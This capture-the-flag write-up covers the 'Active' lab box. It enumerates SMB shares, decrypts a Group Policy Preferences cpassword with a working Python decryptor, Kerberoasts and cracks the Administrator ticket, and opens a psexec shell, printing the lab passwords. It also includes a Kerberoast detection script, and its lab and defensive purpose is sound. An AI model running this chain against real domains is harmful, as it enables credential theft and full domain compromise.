Active
Port Scanning
nmap -p53,88,135,139,445,464,593,636,3268,5722,9389,47001,49155,49152,49158,49168,49165,49169,49157,49154,49153 -sV -sC -T4 -Pn -oA active.htb active.htb
Scanning Result
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
SMB Enum
SMB is open on ports 139/445
smbclient
smbclient -L //active.htb/Replication -U ""%""
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
smbclient login
smbclient //10.10.10.100/Replication -U ""%""
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Groups.xml A 533 Thu Jul 19 04:46:06 2018
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
enum4linux
enum4linux active.htb
==================================( Share Enumeration on active.htb )==================================
do_connect: Connection to active.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on active.htb
//active.htb/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//active.htb/C$ Mapping: DENIED Listing: N/A Writing: N/A
//active.htb/IPC$ Mapping: OK Listing: DENIED Writing: N/A
[E] Can't understand response:
do_connect: Connection to DC.active.htb failed (Error NT_STATUS_UNSUCCESSFUL)
//active.htb/NETLOGON Mapping: N/A Listing: N/A Writing: N/A
//active.htb/Replication Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
do_connect: Connection to DC.active.htb failed (Error NT_STATUS_UNSUCCESSFUL)
//active.htb/SYSVOL Mapping: N/A Listing: N/A Writing: N/A
//active.htb/Users Mapping: DENIED Listing: N/A Writing: N/A
smbmap
smbmap -H active.htb -R
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
Foothold
Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
active.htb\SVC_TGS : edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Whenever a new Group Policy Preference (GPP) is created, there’s an xml file created in the SYSVOL share with that config data, including any passwords associated with the GPP. For security, Microsoft AES encrypts the password before it’s stored as cpassword. But then Microsoft published the key on MSDN!
Microsoft issued a patch in 2014 that prevented admins from putting passwords into GPP. But that patch doesn’t do anything about any of these breakable passwords that were already there, and from what I understand, pentesters still find these regularly in 2018. For more details, check out this AD Security post.
Decrypt the cpassword
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ | tee cred
active.htb\SVC_TGS : GPPstillStandingStrong2k18
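Added example (not from the original writeup): a Python audit of GPP preference XML for leftover cpassword attributes, using the Groups.xml retrieved above as constructed sample input; it generalises to the other GPP files that carry the same attribute (Services, ScheduledTasks, Drives, DataSources). Decryption uses the AES key Microsoft published on MSDN via the optional `cryptography` package and returns None when that package is not installed.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample input: the Groups.xml pulled from the Replication share above, embedded inline.
GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""

# AES-256 key Microsoft documented on MSDN for GPP cpassword; same key in every domain, IV is 16 zero bytes.
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def find_cpasswords(xml_text):
    """Return every cpassword in a GPP preference XML, with the account it belongs to and
    the 'changed' timestamp of the enclosing <User>/<Service>/<Task>/... item."""
    root = ET.fromstring(xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for el in root.iter():
        if "cpassword" not in el.attrib:
            continue
        item = parents.get(el, el)  # <Properties> sits under the item that carries name/changed
        findings.append({
            "item": item.tag,
            "account": el.get("userName") or el.get("runAs") or el.get("accountName") or item.get("name"),
            "changed": item.get("changed"),
            "cpassword": el.get("cpassword"),
        })
    return findings


def cpassword_bytes(cpassword):
    """GPP strips the base64 '=' padding; restore it before decoding."""
    return base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))


def gpp_decrypt(cpassword):
    """Decrypt with the public key (same scheme gpp-decrypt uses: AES-256-CBC, zero IV, UTF-16LE).
    Assumes the optional `cryptography` package; returns None when it is not installed."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError:
        return None
    dec = Cipher(algorithms.AES(GPP_KEY), modes.CBC(bytes(16))).decryptor()
    plain = dec.update(cpassword_bytes(cpassword)) + dec.finalize()
    plain = plain[:-plain[-1]]  # strip PKCS#7 padding
    return plain.decode("utf-16-le")


if __name__ == "__main__":
    for f in find_cpasswords(GROUPS_XML):
        print(f"{f['item']} {f['account']} (changed {f['changed']}): {gpp_decrypt(f['cpassword']) or f['cpassword']}")
```

Pointed at a copy of SYSVOL, the same loop over every *.xml under Policies lists each GPP item that still carries a stored credential, which is the check to run after the 2014 patch since that patch only stops new ones being written.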
Check the account's SMB access with the recovered credentials
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Priv Esc
Check for Kerberoastable accounts (user accounts with an SPN set)
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
Obtained hash (GetUserSPNs.out)
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$1ffa88531f4948eca74e8c85e3d7096f$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
Using hashcat to crack it
hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force
-m 13100 is the hashcat mode for Kerberos 5 TGS-REP etype 23 (RC4-HMAC) tickets, which are keyed with the service account's NTLM hash
Cracked
administrator : Ticketmaster1968
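Added detection example (not from the writeup): the roast above shows up on the DC as Security Event ID 4769 service-ticket requests with ticket encryption type 0x17 (RC4-HMAC, etype 23) for user accounts that have an SPN. This Python check runs over constructed sample events modelled on those fields (field names are assumptions) and flags the requester, raising severity when several user SPNs are hit in a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Event ID 4769 records reduced to the fields the check needs.
# Field names are assumptions; the values are made up, not real logs from this box.
EVENTS = [
    {"time": "2018-07-21 18:40:01", "user": "SVC_TGS@ACTIVE.HTB", "service": "Administrator", "etype": "0x17", "src": "10.10.14.5"},
    {"time": "2018-07-21 18:40:01", "user": "SVC_TGS@ACTIVE.HTB", "service": "krbtgt", "etype": "0x17", "src": "10.10.14.5"},
    {"time": "2018-07-21 18:41:10", "user": "DC$@ACTIVE.HTB", "service": "DC$", "etype": "0x12", "src": "10.10.10.100"},
    {"time": "2018-07-21 18:42:30", "user": "SVC_TGS@ACTIVE.HTB", "service": "DC$", "etype": "0x12", "src": "10.10.14.5"},
    {"time": "2018-07-21 18:50:00", "user": "jdoe@ACTIVE.HTB", "service": "svc_sql", "etype": "0x17", "src": "10.10.14.9"},
    {"time": "2018-07-21 18:50:01", "user": "jdoe@ACTIVE.HTB", "service": "svc_web", "etype": "0x17", "src": "10.10.14.9"},
    {"time": "2018-07-21 18:50:02", "user": "jdoe@ACTIVE.HTB", "service": "svc_backup", "etype": "0x17", "src": "10.10.14.9"},
]

RC4_HMAC = "0x17"  # etype 23: the ticket type GetUserSPNs.py requests and hashcat -m 13100 cracks


def is_user_spn(service):
    """Machine accounts (name$) and krbtgt are normal ticket traffic; only user-account SPNs are roastable."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def kerberoast_alerts(events, window=timedelta(minutes=5), burst=3):
    """Group RC4 service-ticket requests for user SPNs by (requesting user, source IP).
    One such request already merits a look on a domain that supports AES; `burst` or more
    distinct SPNs inside `window` of the first request is the classic roasting pattern."""
    hits = defaultdict(list)
    for ev in events:
        if ev["etype"] == RC4_HMAC and is_user_spn(ev["service"]):
            hits[(ev["user"], ev["src"])].append(ev)
    alerts = []
    for (user, src), evs in hits.items():
        first = min(datetime.fromisoformat(e["time"]) for e in evs)
        in_window = {e["service"] for e in evs
                     if datetime.fromisoformat(e["time"]) - first <= window}
        alerts.append({
            "user": user, "src": src,
            "services": sorted({e["service"] for e in evs}),
            "severity": "high" if len(in_window) >= burst else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in kerberoast_alerts(EVENTS):
        print(f"[{a['severity']}] {a['user']} from {a['src']} requested RC4 tickets for {', '.join(a['services'])}")
```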
Get a shell using psexec
psexec.py active.htb/administrator@10.10.10.100